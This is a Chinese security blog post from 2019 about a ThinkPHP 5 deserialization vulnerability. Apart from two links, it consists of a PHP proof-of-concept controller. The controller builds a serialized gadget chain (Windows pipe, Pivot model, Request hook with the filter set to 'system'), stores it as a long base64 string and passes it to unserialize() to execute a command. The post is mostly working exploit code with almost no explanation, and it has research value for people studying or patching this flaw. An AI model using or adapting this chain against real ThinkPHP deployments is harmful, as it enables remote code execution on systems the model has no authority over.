Neurohazard
暮雲煙月,皓首窮經;森羅萬象,如是我聞。

ThinkPHP 反序列化漏洞

wpadmin~August 2, 2019 /InfoSec

ThinkPHP 反序列化漏洞

正文

https://blog.riskivy.com/%E6%8C%96%E6%8E%98%E6%9A%97%E8%97%8Fthinkphp%E4%B8%AD%E7%9A%84%E5%8F%8D%E5%BA%8F%E5%88%97%E5%88%A9%E7%94%A8%E9%93%BE/

https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection

<?php

namespace app\index\controller;

use think\process\pipes\Windows;
use think\Request;
use think\Model\Pivot;

class Index {

    public function index() {

//        $ww = new Windows(1,null);
//        $file=new Pivot();
//        $rr=new Request();
//        $rr->hook(["append"=>array($rr,"isAjax")]);
//        $rr->param("calc");
//        $rr->filter("system");
//        $file->setAttr("exp",$rr);
//        $ww->setFiles([0=>$file]);
//        $data= serialize($ww);
//        return base64_encode($data);

        $json="TzoyNzoidGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzIjo4OntzOjM0OiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGZpbGVzIjthOjE6e2k6MDtPOjE3OiJ0aGlua1xtb2RlbFxQaXZvdCI6MzI6e3M6NjoicGFyZW50IjtOO3M6MjE6IgAqAGF1dG9Xcml0ZVRpbWVzdGFtcCI7YjowO3M6MjE6IgB0aGlua1xNb2RlbABpc1VwZGF0ZSI7YjowO3M6MTg6IgB0aGlua1xNb2RlbABmb3JjZSI7YjowO3M6MjQ6IgB0aGlua1xNb2RlbAB1cGRhdGVXaGVyZSI7TjtzOjEzOiIAKgBjb25uZWN0aW9uIjthOjA6e31zOjg6IgAqAHF1ZXJ5IjtzOjE1OiJcdGhpbmtcZGJcUXVlcnkiO3M6NzoiACoAbmFtZSI7czo1OiJQaXZvdCI7czo4OiIAKgB0YWJsZSI7TjtzOjc6IgAqAGF1dG8iO2E6MDp7fXM6OToiACoAaW5zZXJ0IjthOjA6e31zOjk6IgAqAHVwZGF0ZSI7YTowOnt9czoxNjoiACoAcXVlcnlJbnN0YW5jZSI7TjtzOjU6IgAqAHBrIjtzOjI6ImlkIjtzOjg6IgAqAGZpZWxkIjthOjA6e31zOjk6IgAqAGRpc3VzZSI7YTowOnt9czoxMToiACoAcmVhZG9ubHkiO2E6MDp7fXM6NzoiACoAdHlwZSI7YTowOnt9czoxNzoiAHRoaW5rXE1vZGVsAGRhdGEiO2E6MTp7czozOiJleHAiO086MTM6InRoaW5rXFJlcXVlc3QiOjM2OntzOjExOiIAKgBpbnN0YW5jZSI7TjtzOjk6IgAqAGNvbmZpZyI7TzoxMjoidGhpbmtcQ29uZmlnIjoyOntzOjIwOiIAdGhpbmtcQ29uZmlnAGNvbmZpZyI7YTo5OntzOjM6ImFwcCI7YTo1NTp7czo4OiJhcHBfbmFtZSI7czowOiIiO3M6ODoiYXBwX2hvc3QiO3M6MDoiIjtzOjk6ImFwcF9kZWJ1ZyI7YjoxO3M6OToiYXBwX3RyYWNlIjtiOjA7czoxMDoiYXBwX3N0YXR1cyI7czowOiIiO3M6MTY6ImFwcF9tdWx0aV9tb2R1bGUiO2I6MTtzOjE2OiJhdXRvX2JpbmRfbW9kdWxlIjtiOjA7czoxNDoicm9vdF9uYW1lc3BhY2UiO2E6MDp7fXM6MTk6ImRlZmF1bHRfcmV0dXJuX3R5cGUiO3M6NDoiaHRtbCI7czoxOToiZGVmYXVsdF9hamF4X3JldHVybiI7czo0OiJqc29uIjtzOjIxOiJkZWZhdWx0X2pzb25wX2hhbmRsZXIiO3M6MTE6Impzb25wUmV0dXJuIjtzOjE3OiJ2YXJfanNvbnBfaGFuZGxlciI7czo4OiJjYWxsYmFjayI7czoxNjoiZGVmYXVsdF90aW1lem9uZSI7czozOiJQUkMiO3M6MTQ6Imxhbmdfc3dpdGNoX29uIjtiOjA7czoxNDoiZGVmYXVsdF9maWx0ZXIiO3M6MDoiIjtzOjEyOiJkZWZhdWx0X2xhbmciO3M6NToiemgtY24iO3M6MTI6ImNsYXNzX3N1ZmZpeCI7YjowO3M6MTc6ImNvbnRyb2xsZXJfc3VmZml4IjtiOjA7czoxNDoiZGVmYXVsdF9tb2R1bGUiO3M6NToiaW5kZXgiO3M6MTY6ImRlbnlfbW9kdWxlX2xpc3QiO2E6MTp7aTowO3M6NjoiY29tbW9uIjt9czoxODoiZGVmYXVsdF9jb250cm9sbGVyIjtzOjU6IkluZGV4IjtzOjE0OiJkZWZhdWx0X2FjdGlvbiI7czo1OiJpbmRleCI7czoxNjoiZGVmYXVsdF92YWxpZGF0ZSI7czowOiIiO3M6MTI6ImVtcHR5X21vZHVsZSI7czowOiIiO3M6MTY6ImVtcHR5X2NvbnRyb2xsZXIiO3M6NToiRXJyb3IiO3M6MTc6InVzZV9hY3Rpb25fcHJlZml4IjtiOjA7czoxMzoiYWN0aW9uX3N1ZmZpeCI7czowOiIiO3M6MjI6ImNvbnRyb2xsZXJfYXV0b19zZWFyY2giO2I6MDtzOjEyOiJ2YXJfcGF0aGluZm8iO3M6MToicyI7czoxNDoicGF0aGluZm9fZmV0Y2giO2E6Mzp7aTowO3M6MTQ6Ik9SSUdfUEFUSF9JTkZPIjtpOjE7czoxODoiUkVESVJFQ1RfUEFUSF9JTkZPIjtpOjI7czoxMjoiUkVESVJFQ1RfVVJMIjt9czoxMzoicGF0aGluZm9fZGVwciI7czoxOiIvIjtzOjE2OiJodHRwc19hZ2VudF9uYW1lIjtzOjA6IiI7czoxNToidXJsX2h0bWxfc3VmZml4IjtzOjQ6Imh0bWwiO3M6MTY6InVybF9jb21tb25fcGFyYW0iO2I6MDtzOjE0OiJ1cmxfcGFyYW1fdHlwZSI7aTowO3M6MTQ6InVybF9sYXp5X3JvdXRlIjtiOjA7czoxNDoidXJsX3JvdXRlX211c3QiO2I6MDtzOjIwOiJyb3V0ZV9jb21wbGV0ZV9tYXRjaCI7YjowO3M6MTY6InJvdXRlX2Fubm90YXRpb24iO2I6MDtzOjE1OiJ1cmxfZG9tYWluX3Jvb3QiO3M6MDoiIjtzOjExOiJ1cmxfY29udmVydCI7YjoxO3M6MjA6InVybF9jb250cm9sbGVyX2xheWVyIjtzOjEwOiJjb250cm9sbGVyIjtzOjEwOiJ2YXJfbWV0aG9kIjtzOjc6Il9tZXRob2QiO3M6ODoidmFyX2FqYXgiO3M6MDoiIjtzOjg6InZhcl9wamF4IjtzOjU6Il9wamF4IjtzOjEzOiJyZXF1ZXN0X2NhY2hlIjtiOjA7czoyMDoicmVxdWVzdF9jYWNoZV9leHBpcmUiO047czoyMDoicmVxdWVzdF9jYWNoZV9leGNlcHQiO2E6MDp7fXM6MjE6ImRpc3BhdGNoX3N1Y2Nlc3NfdG1wbCI7czo1NToiRDpccGhwc3R1ZHlcV1dXXHRoaW5rcGhwXHRoaW5rcGhwL3RwbC9kaXNwYXRjaF9qdW1wLnRwbCI7czoxOToiZGlzcGF0Y2hfZXJyb3JfdG1wbCI7czo1NToiRDpccGhwc3R1ZHlcV1dXXHRoaW5rcGhwXHRoaW5rcGhwL3RwbC9kaXNwYXRjaF9qdW1wLnRwbCI7czoxNDoiZXhjZXB0aW9uX3RtcGwiO3M6NTc6IkQ6XHBocHN0dWR5XFdXV1x0aGlua3BocFx0aGlua3BocC90cGwvdGhpbmtfZXhjZXB0aW9uLnRwbCI7czoxMzoiZXJyb3JfbWVzc2FnZSI7czozMzoi6aG16Z2i6ZSZ6K+v77yB6K+356iN5ZCO5YaN6K+V772eIjtzOjE0OiJzaG93X2Vycm9yX21zZyI7YjowO3M6MTY6ImV4Y2VwdGlvbl9oYW5kbGUiO3M6MDoiIjtzOjE3OiJ1cmxfZG9tYWluX2RlcGxveSI7YjowO31zOjg6InRlbXBsYXRlIjthOjk6e3M6NDoidHlwZSI7czo1OiJUaGluayI7czo5OiJ2aWV3X2Jhc2UiO3M6MDoiIjtzOjk6InZpZXdfcGF0aCI7czowOiIiO3M6MTE6InZpZXdfc3VmZml4IjtzOjQ6Imh0bWwiO3M6OToidmlld19kZXByIjtzOjE6IlwiO3M6OToidHBsX2JlZ2luIjtzOjE6InsiO3M6NzoidHBsX2VuZCI7czoxOiJ9IjtzOjEyOiJ0YWdsaWJfYmVnaW4iO3M6MToieyI7czoxMDoidGFnbGliX2VuZCI7czoxOiJ9Ijt9czozOiJsb2ciO2E6NDp7czo0OiJ0eXBlIjtzOjQ6IkZpbGUiO3M6NToibGV2ZWwiO2E6MDp7fXM6MTI6InJlY29yZF90cmFjZSI7YjowO3M6NDoicGF0aCI7czowOiIiO31zOjU6InRyYWNlIjthOjI6e3M6NDoidHlwZSI7czo0OiJIdG1sIjtzOjQ6ImZpbGUiO3M6NTI6IkQ6XHBocHN0dWR5XFdXV1x0aGlua3BocFx0aGlua3BocC90cGwvcGFnZV90cmFjZS50cGwiO31zOjU6ImNhY2hlIjthOjQ6e3M6NDoidHlwZSI7czo0OiJGaWxlIjtzOjY6InByZWZpeCI7czowOiIiO3M6NjoiZXhwaXJlIjtpOjA7czo0OiJwYXRoIjtzOjA6IiI7fXM6Nzoic2Vzc2lvbiI7YTo3OntzOjI6ImlkIjtzOjA6IiI7czoxNDoidmFyX3Nlc3Npb25faWQiO3M6MDoiIjtzOjY6InByZWZpeCI7czo1OiJ0aGluayI7czo0OiJ0eXBlIjtzOjA6IiI7czoxMDoiYXV0b19zdGFydCI7YjoxO3M6ODoiaHR0cG9ubHkiO2I6MTtzOjY6InNlY3VyZSI7YjowO31zOjY6ImNvb2tpZSI7YTo3OntzOjY6InByZWZpeCI7czowOiIiO3M6NjoiZXhwaXJlIjtpOjA7czo0OiJwYXRoIjtzOjE6Ii8iO3M6NjoiZG9tYWluIjtzOjA6IiI7czo2OiJzZWN1cmUiO2I6MDtzOjg6Imh0dHBvbmx5IjtzOjA6IiI7czo5OiJzZXRjb29raWUiO2I6MTt9czo4OiJkYXRhYmFzZSI7YToyMTp7czo0OiJ0eXBlIjtzOjU6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";
        unserialize(base64_decode($json));
//return(base64_decode($json));


//        $ww->setFiles([0=>$file]);
//        $data= serialize($ww);
//        unserialize($data);

      //  call_user_func_array("call_user_func_array",array($this,"hello"));
//        $ww = new Windows(1, null);
//
//
//
//        $kk = new Pivot();
//        return $kk."";
//        //$data= serialize($ww);
//        $data = "TzoyNzoidGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzIjo4OntzOjM0OiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGZpbGVzIjthOjE6e2k6MDtzOjg6IkQ6XDEudHh0Ijt9czo0MDoiAHRoaW5rXHByb2Nlc3NccGlwZXNcV2luZG93cwBmaWxlSGFuZGxlcyI7YTowOnt9czozODoiAHRoaW5rXHByb2Nlc3NccGlwZXNcV2luZG93cwByZWFkQnl0ZXMiO2E6Mjp7aToxO2k6MDtpOjI7aTowO31zOjQyOiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGRpc2FibGVPdXRwdXQiO2I6MTtzOjU6InBpcGVzIjthOjA6e31zOjE0OiIAKgBpbnB1dEJ1ZmZlciI7TjtzOjg6IgAqAGlucHV0IjtOO3M6MzQ6IgB0aGlua1xwcm9jZXNzXHBpcGVzXFBpcGVzAGJsb2NrZWQiO2I6MTt9";
//        $aa = base64_decode($data);
//        unserialize($aa);

//        $tt = new Request();
//        $method=array("dsds"=>array($tt,"isAjax"));
//        $tt->hook($method);
//        $tt->dsds(1);
        //return $aa;
    }

    public function hello($name = 'ThinkPHP5') {
        return 'hello,' . $name;
    }

}

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.